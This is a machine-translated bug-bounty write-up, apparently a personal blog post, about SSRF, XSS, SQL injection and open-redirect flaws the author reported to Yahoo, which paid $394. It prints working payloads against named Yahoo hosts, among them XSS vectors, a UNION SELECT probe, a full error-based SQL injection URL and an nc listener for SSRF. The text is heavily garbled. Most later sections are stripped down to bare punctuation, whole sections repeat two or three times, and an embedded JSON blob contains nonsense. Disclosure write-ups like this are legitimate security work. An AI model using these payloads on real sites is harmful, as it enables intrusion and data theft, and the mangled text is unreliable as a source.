Three hundred and ninety four dollars
In this article, I want to share my experience of participating in the promotion program from Yahoo (and not only). I'll tell you what vulnerabilities I found, what difficulties I ran into and how generous Yahoo turned out to be. Waiting for you under the cut!
I have been interested in the issue of information security for quite some time (somewhere since 2007). My inner decision, which I try to stick to, is my hobby. For I do not want to turn into a routine that brings such a charge of adrenaline. But the hobby is different. And a little less than a year ago I decided to leave the underground. Went to PHDIII. He took the honorable fourth place in the competition "WAF Bypass". My personal opinion - I took it only because I was the fourth and last person who sent at least one key in this contest :). Took part in the online and offline stages of the Symantec Cyber ​​Readiness Challenge, where, to his surprise and pleasure, he was in the top ten. In general, he showed himself and looked at smart people. But this is all satisfaction of Maslow's 4th step of the pyramid And I, like any living person, want to eat. And the underlying desire for my hobby not only to bring pleasure, but also money, turned into an obsessive idea.
')
The turning point occurred after reading the post by Sergey belove. Favorites: IT security links . Where I stumbled upon an obvious thing, which for some reason I didn’t guess myself - a link to the list of open programs of Bug Bounty. Where, besides the obvious programs from Yandex, Google, Facebook, many others have been listed. Read - done.
At first, I chose a reward program from American phones and payphones. Two sleepless weeks, it seemed to me, were not in vain. About 30 error messages, including: SQLi on services of different severity, changing the password to any user and much more. But after two weeks of semi-automatic answers, “We heard you. You will be contacted in the near future, ”I wondered, but how much is“ soon ”? Wandered through the forums and loomed unpleasant situation. Answer long, ooooochen long. With a marked top bar of $ 5,000, real pennies are paid. And in general, the community has a very negative opinion about this reward program. It was at that moment that my laptop burned with current practices that I did not back up. I took it as a sign of fate and made a willful decision: “I didn’t sleep too much to continue sending reports without seeing feedback.” At the moment, the situation is not so bad - they confirmed 9 vulnerabilities. True, the sample is absolutely not obvious - the variation in dates, the variation in the level of criticality. And, most importantly, now the lottery is waiting for me - the money will pay only the ten best for the quarter. The rest just say thank you. I cannot say more at the moment, because the status of even those errors that have been confirmed is completely unclear.
But we will return back - just the middle of November was in the yard. And I was looking for a new victim. My interest in participating in such programs was fueled by a response from Telekom.de , where they thanked me for reporting the vulnerability. And, despite the fact that my message was repeated, they very much want to send me 50 euros for their efforts and are waiting for details from me.
And then I stumbled upon a flurry of tweets, posts and likes with the general title "Yahoo will stop sending T-shirts with the money of the director of the security department and officially opens its promotion program." Quickly found a link to the incentive program, which opened on November 1, 2013. Since February 1, 2014, they have cooperated with HackerOne and now they have to send here . I was hoping that a major search engine on the one hand would not freeze for six months and on the other hand, at the very start, you can skip the cream. I'll say right away - my expectations were met. Now in order.
The first few days I spent in the scientific method of spear. I have my own empirical methods - what to look for, where to look. Yes, and just had to look around.
On the fourth day of my hesitation, I came across the first URL ( http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://twstock.yahoo.com/w/news_content/url /d/a/140210/2/49cvs.html&.ts=1384478129&.int=tw&.lang=zh-hant-tw ). Primary tests showed that I was going in the right direction. Naturally, I noticed the url parameter.
- “Maybe iframe?” - I thought.
But no, it was the most server-side request. How does he work:
1. The script takes the parameter url
2. Requests it, in reality it is a json-container ( http://tw.stock.yahoo.com/w/news_content/url/d/a/140210/2/49cvs.html )
3. Makes of all this page.
Immediately got the idea to replace the URL. And to make a request not only to another domain, but also to another port:
http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.com:6666/nonexist
On the server side we get:
On the header is very similar to CURL (as it becomes clear later - with CURLOPT_FOLLOWLOCATION turned off). After that, I checked the allowed protocols:
- work: http, https;
- do not work: ftp, gopher, tftp, ldap, dict, ssh2, file, telnet, smtp, mailto, pop3, imap;
- Redirect through Location does not work.
The result was a very limited use of SSRF .
Then it was a sensible move to keep the source file and request it:
http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.comt555/content_spoofed.html
Voila We have a substitution of content. But if we have a substitution of content, then it would be a sin not to try to achieve XSS. I began to experiment with the parameters, but ... they were well validated. The first bell was the replacement of the cobrand_url parameter with:
Everything worked, but expecting a click from the user is not the best option. Although in the report I suggested using a naked girl or a sad cat as an image.
I started testing the parameters further and making the following replacement:
(escaped double quotation mark). I received a very unexpected error stack trace (unfortunately I did not save it). The bottom line is that it said that some Blueprint could not properly process and display what was slipped to it. What it is? The first time I see. Go to Google and find that there is a magic modifier " w-raw ":
http://tw.m.yahoo.com/w-raw/twstock/news_content.php?url=http://twstock.yahoo.com/w/news_content/url/d/a/140210/2/ 49cvs.html
Which shows the source code of the template (well, as I understood it) before the output. It became clear that and how fray when trying to collect data before the output. And besides, it became clear that I can change the structure of the source code itself by adding its markup. Then I googled a little more, looked at the source of different pages a little more through w-raw and googled a bit more ... And I found this funny construction in the Blueprint source code:
At the same time, the CDATA content was displayed on the page without change Looks like this is what you need.
By trial and error, I found the right payload:
Both vectors worked and, and, actually,
I have been interested in the issue of information security for quite some time (somewhere since 2007). My inner decision, which I try to stick to, is my hobby. For I do not want to turn into a routine that brings such a charge of adrenaline. But the hobby is different. And a little less than a year ago I decided to leave the underground. Went to PHDIII. He took the honorable fourth place in the competition "WAF Bypass". My personal opinion - I took it only because I was the fourth and last person who sent at least one key in this contest :). Took part in the online and offline stages of the Symantec Cyber ​​Readiness Challenge, where, to his surprise and pleasure, he was in the top ten. In general, he showed himself and looked at smart people. But this is all satisfaction of Maslow's 4th step of the pyramid And I, like any living person, want to eat. And the underlying desire for my hobby not only to bring pleasure, but also money, turned into an obsessive idea.
')
The turning point occurred after reading the post by Sergey belove. Favorites: IT security links . Where I stumbled upon an obvious thing, which for some reason I didn’t guess myself - a link to the list of open programs of Bug Bounty. Where, besides the obvious programs from Yandex, Google, Facebook, many others have been listed. Read - done.
At first, I chose a reward program from American phones and payphones. Two sleepless weeks, it seemed to me, were not in vain. About 30 error messages, including: SQLi on services of different severity, changing the password to any user and much more. But after two weeks of semi-automatic answers, “We heard you. You will be contacted in the near future, ”I wondered, but how much is“ soon ”? Wandered through the forums and loomed unpleasant situation. Answer long, ooooochen long. With a marked top bar of $ 5,000, real pennies are paid. And in general, the community has a very negative opinion about this reward program. It was at that moment that my laptop burned with current practices that I did not back up. I took it as a sign of fate and made a willful decision: “I didn’t sleep too much to continue sending reports without seeing feedback.” At the moment, the situation is not so bad - they confirmed 9 vulnerabilities. True, the sample is absolutely not obvious - the variation in dates, the variation in the level of criticality. And, most importantly, now the lottery is waiting for me - the money will pay only the ten best for the quarter. The rest just say thank you. I cannot say more at the moment, because the status of even those errors that have been confirmed is completely unclear.
But we will return back - just the middle of November was in the yard. And I was looking for a new victim. My interest in participating in such programs was fueled by a response from Telekom.de , where they thanked me for reporting the vulnerability. And, despite the fact that my message was repeated, they very much want to send me 50 euros for their efforts and are waiting for details from me.
And then I stumbled upon a flurry of tweets, posts and likes with the general title "Yahoo will stop sending T-shirts with the money of the director of the security department and officially opens its promotion program." Quickly found a link to the incentive program, which opened on November 1, 2013. Since February 1, 2014, they have cooperated with HackerOne and now they have to send here . I was hoping that a major search engine on the one hand would not freeze for six months and on the other hand, at the very start, you can skip the cream. I'll say right away - my expectations were met. Now in order.
The first few days I spent in the scientific method of spear. I have my own empirical methods - what to look for, where to look. Yes, and just had to look around.
Part one. XSS at tw.m.yahoo.com.
On the fourth day of my hesitation, I came across the first URL ( http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://twstock.yahoo.com/w/news_content/url /d/a/140210/2/49cvs.html&.ts=1384478129&.int=tw&.lang=zh-hant-tw ). Primary tests showed that I was going in the right direction. Naturally, I noticed the url parameter.
- “Maybe iframe?” - I thought.
But no, it was the most server-side request. How does he work:
1. The script takes the parameter url
2. Requests it, in reality it is a json-container ( http://tw.stock.yahoo.com/w/news_content/url/d/a/140210/2/49cvs.html )
json container
{ «Headline»: "\ u5f71 \ u97ff \ u5e02 \ u5834 \ u7684 \ u807d \ u8b49 \ u6703 \ u5373 \ u5c07 \ u4f86 \ u5230 Fed \ u4e3b \ u5e2d \ u8449 \ u502b \ u6210 \ u70ba \ u7126 \ u9ede", « pageUrl ”:“ http: \ / \ / tw.stock.yahoo.com \ / news_content \ / url \ / d \ / a \ / 140210 \ / 2 \ /49cvs.html ”,“ provider ”: {“ cobrand_logo ” : "Http: \ / \ / tw.yimg.com \ / i \ / tw \ / stock \ / revamp \ /cnyes_logo_130_30.gif", "cobrand_name": "\ u9245 \ u4ea8 \ u7db2", "cobrand_url": " http: \ / \ / www.cnyes.com \ / "," english_name ":" cnYES.com "," legal_name ":" \ u9245 \ u4ea8 \ u7db2 "," title ":" \ u9245 \ u4ea8 \ u7db2 " }, "Date": "20140211", "unixtime": "1392058608", "author": "\ u7de8 \ u8b6f \ u90ed \ u7167 \ u9752", "summary": "\ u65b0 \ u4efb \ u806f \ u6e96 \ u6703 (Fed) \ u4e3b \ u5e2d \ u8449 \ u502b \ u672c \ u5468 \ u5c07 \ u9996 \ u5ea6 \ u5728 \ u570b & amp; u77da \ u76ee "," coverStory ":" Y "," source ":" \ u9245 \ u4ea8 \ u7db2 "," category ":" N10 "," paragraphs ": [" \ u65b0 \ u4efb \ u806f \ u6e96 \ u6703 (Fed) \ u4e3b \ u5e2d \ u8449 \ u502b \ u672c \ u5468 \ u5c07 \ u9996 \ u5ea6 \ u5728 \ u57 0b \ u6703 \ u9032 \ u884c \ u807d \ u8b49 \ u6703 \ uff0c \ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadhaihaihaiiuyufuqiuyufiuyufiuiuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaihaihaihaiiuiuqiuiuiuuuuuuqaiuyuuuuuqaqiuyuuqiuyuhhhhhhhhhhhhhhvhhhhhhhhvhaihaiiuhhhhhhhhhhhhhhhvhaihaihaiiuyu \ u6700 \ u65b0 \ u7684 \ u5c31 \ u696d \ u5831 \ u544a \ u4e0d \ u6703 \ u6539 \ u8b8aFed \ u7068 \ u65bf \ u7b56 \ u3002 \ "u300c \ u5c31 \ u586d \ u586d \ u586d \ u586d \ u58b u6295 \ u8cc7 \ u4eba \ u4e0d \ u9700 \ u70ba \ u4e4b \ u6050 \ u614c \ uff0c \ u4e5f \ u7121 \ u9700 \ u70ba \ u4e4b \ u8208 \ u596e \ uff0c \ u300dKoto to work for money programs for money programs for money programs for money programs for money programs for money systems for money programs for money systems for education for people who got money for help to help you help you all more and more to make better in rest of your business. u502b \ u5c07 \ u5f37 \ u8abf \ uff0cFed \ u4e0d \ u6703 \ u53d6 \ u6d88 \ u4f4e \ u5229 \ u7387 \ u7acb \ u5834 \ u3002 "," \ u300c \ u9019 \ u500bFed \ i5834 \ u3002 \ u7acb \ u5834 \ u3002 "u" i \ u300c \ u9019 \ u500bFed \ i5834 \ u3002 \ u7acb \ u5834 \ u3002 "u \ u300c \ u9019 \ u500bFed \ e5834 \ u3002 \ u7acb \ u5834 \ u3002 u u \ 6 8 \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ u9019 \ u9ebc \ u505a \ u3002FOMC \ u7684 \ u591a u u7878 \ u59d4 \ u54e1 \ u4e5f \ u4e0d \ u6703 \ u9019 \ u9ebc \ u505a \ u3002 \ u6bc \ u505a \ u3002 \ u4dc \ u504a \ u5449 \ u9ebc \ u505a \ u502 \ uaeka \ u502c \ u502a \ u5e5e u4e0a \ u5348 \ u5728 \ u773e \ u9662 \ u91d1 \ u878d \ u670d \ u52d9 \ u59d4 \ u54e1 \ u6703 \ u9032 \ u8 84c \ u807d \ u8b49 \ u6703 \ uff0c \ u5979 \ u53ef \ u80fd \ u6703 \ u9762 \ u81e8 \ u8f03 \ u5468 \ u56c3 \ u9662 \ u9280 \ u884 uu4db \ uyeker \ u9662 \ u5380 \ u884c \ u5668 \ uycf \ u596 \ 84 ukb49 \ u6703 \ ua6642 \ uff0c \ u66f4 \ u56b4 \ u53b2 \ u7684 \ u8cea \ u554f \ u3002Kotok \ u8aa \ u5979 \ u5728 \ u773e \ u9662 \ u5c07 \ u6703 \ u64 \ ua \ uyu * 176,128 \ u773e \ u773e \ u5662 uu6b2 \ u6642 uu6a2 u4f55 \ u7684 \ u6575 \ u610f \ u5c07 \ u6703 \ u6eab \ u548c \ u6709 \ u79ae \ u3002 "," \ u300cFed \ u7684 \ u653f \ u7b56 \ u8def \ u7dda \ u5df2 \ u5b9a \ uff0c \ u300dKotok \ u8aaa \ u3002 \ u300c \ u9084 \ u6709 \ u5176 \ u4ed6 \ u66f4 \ u70ba \ u91cd \ u8981 \ u7684 \ u4e8b \ u60c5 \ uff0cFed \ u4e26 \ u975e \ u5176 \ u4e00 \ u30022014 \ u5e74 \ u4a5a5a4 ue5176 \ u4e00 \ u30022014 \ u5e74 \ u4a5a5a5 u475e \ u5176 \ u4e00 \ u30022014 \ u5e74 \ u4a4a5 \ u4e0d \ u5217 \ u70ba \ u91cd \ u8981 \ u4e0d \ u78ba \ u5b9a \ u56e0 \ u7d20 \ u3002 \ u300d "]," stockId ": []," images ": []," tables ": []}
3. Makes of all this page.
Immediately got the idea to replace the URL. And to make a request not only to another domain, but also to another port:
http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.com:6666/nonexist
On the server side we get:
nc -lvv 6666 Connection from 202.43.194.189 port 6666 [tcp/ircu-2] accepted GET /nonexist HTTP/1.1 Host: example.com:6666 Accept: */* On the header is very similar to CURL (as it becomes clear later - with CURLOPT_FOLLOWLOCATION turned off). After that, I checked the allowed protocols:
- work: http, https;
- do not work: ftp, gopher, tftp, ldap, dict, ssh2, file, telnet, smtp, mailto, pop3, imap;
- Redirect through Location does not work.
The result was a very limited use of SSRF .
Then it was a sensible move to keep the source file and request it:
http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.comt555/content_spoofed.html
Voila We have a substitution of content. But if we have a substitution of content, then it would be a sin not to try to achieve XSS. I began to experiment with the parameters, but ... they were well validated. The first bell was the replacement of the cobrand_url parameter with:
javascript:alert('xss') Everything worked, but expecting a click from the user is not the best option. Although in the report I suggested using a naked girl or a sad cat as an image.
I started testing the parameters further and making the following replacement:
"category":"N10\"" (escaped double quotation mark). I received a very unexpected error stack trace (unfortunately I did not save it). The bottom line is that it said that some Blueprint could not properly process and display what was slipped to it. What it is? The first time I see. Go to Google and find that there is a magic modifier " w-raw ":
http://tw.m.yahoo.com/w-raw/twstock/news_content.php?url=http://twstock.yahoo.com/w/news_content/url/d/a/140210/2/ 49cvs.html
Which shows the source code of the template (well, as I understood it) before the output. It became clear that and how fray when trying to collect data before the output. And besides, it became clear that I can change the structure of the source code itself by adding its markup. Then I googled a little more, looked at the source of different pages a little more through w-raw and googled a bit more ... And I found this funny construction in the Blueprint source code:
<custom-ad mediatype="text/html"><![ CDATA[<img src='http://csc.beap.bc…… /> ]]></custom-ad> At the same time, the CDATA content was displayed on the page without change Looks like this is what you need.
By trial and error, I found the right payload:
"legal_name":"legal_name<\/block><module><custom-ad mediatype=\"text\/html\"><![CDATA[<img src='asdfasdf' onerror=\"alert('xss')\"><script>alert('xss2')<\/script>]]><\/custom-ad><\/module><block>" Both vectors worked and, and, actually,
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
